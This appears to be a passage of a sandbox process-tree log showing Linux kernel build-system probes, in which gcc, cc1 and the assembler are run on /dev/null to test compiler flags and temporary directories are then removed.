/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1873/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccLr8xzW.s5⤵PID:1876
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1873/tmp /tmp/ccLr8xzW.s5⤵PID:1877
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1873/tmp /tmp/ccLr8xzW.s5⤵PID:1877
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1873/tmp /tmp/ccLr8xzW.s5⤵PID:1877
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1873/tmp /tmp/ccLr8xzW.s5⤵PID:1877
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18734⤵PID:1878
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-merge-all-constants\"; else echo \"\"; fi"3⤵PID:1879
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18794⤵PID:1880
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -c -x c /dev/null -o /tmp/a/.tmp_1879/tmp4⤵PID:1881
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1879/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccjzDfhp.s5⤵PID:1882
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1879/tmp /tmp/ccjzDfhp.s5⤵PID:1883
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1879/tmp /tmp/ccjzDfhp.s5⤵PID:1883
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1879/tmp /tmp/ccjzDfhp.s5⤵PID:1883
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1879/tmp /tmp/ccjzDfhp.s5⤵PID:1883
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18794⤵PID:1884
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fmerge-constants\"; else echo \"\"; fi"3⤵PID:1885
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18854⤵PID:1886
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -c -x c /dev/null -o /tmp/a/.tmp_1885/tmp4⤵
- Writes file to tmp directory
PID:1887 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1885/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccAcAr2Q.s5⤵
- Writes file to tmp directory
PID:1888
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1885/tmp /tmp/ccAcAr2Q.s5⤵PID:1889
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1885/tmp /tmp/ccAcAr2Q.s5⤵PID:1889
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1885/tmp /tmp/ccAcAr2Q.s5⤵PID:1889
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1885/tmp /tmp/ccAcAr2Q.s5⤵
- Writes file to tmp directory
PID:1889
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18854⤵PID:1890
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fno-stack-check\"; else echo \"\"; fi"3⤵PID:1891
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18914⤵PID:1892
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -c -x c /dev/null -o /tmp/a/.tmp_1891/tmp4⤵
- Writes file to tmp directory
PID:1893 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1891/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccMW1rLm.s5⤵PID:1894
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1891/tmp /tmp/ccMW1rLm.s5⤵PID:1895
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1891/tmp /tmp/ccMW1rLm.s5⤵PID:1895
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1891/tmp /tmp/ccMW1rLm.s5⤵PID:1895
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1891/tmp /tmp/ccMW1rLm.s5⤵
- Writes file to tmp directory
PID:1895
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18914⤵PID:1896
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY -flive-patching=inline-clone -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fconserve-stack\"; else echo \"\"; fi"3⤵PID:1897
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18974⤵PID:1898
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -pg -mrecord-mcount -mfentry -DCC_USING_FENTRY "-flive-patching=inline-clone" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds -Wno-stringop-overflow -Wno-restrict -Wno-maybe-uninitialized -fno-strict-overflow -fno-merge-all-constants -fmerge-constants -fno-stack-check -fconserve-stack -c -x c /dev/null -o /tmp/a/.tmp_1897/tmp4⤵
- Writes file to tmp directory
PID:1899 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" -D CC_USING_FENTRY /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mrecord-mcount -mfentry "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1897/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" -Wdeclaration-after-statement -Wvla -Wno-pointer-sign -Wno-stringop-truncation -Wno-array-bounds "-Wstringop-overflow=0" -Wno-restrict -Wno-maybe-uninitialized "-std=gnu90" -p -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments "-flive-patching=inline-clone" -fno-strict-overflow -fno-merge-all-constants -fmerge-constants "-fstack-check=no" -fconserve-stack --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cct0Fs7L.s5⤵PID:1900
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1897/tmp /tmp/cct0Fs7L.s5⤵PID:1901
-
-
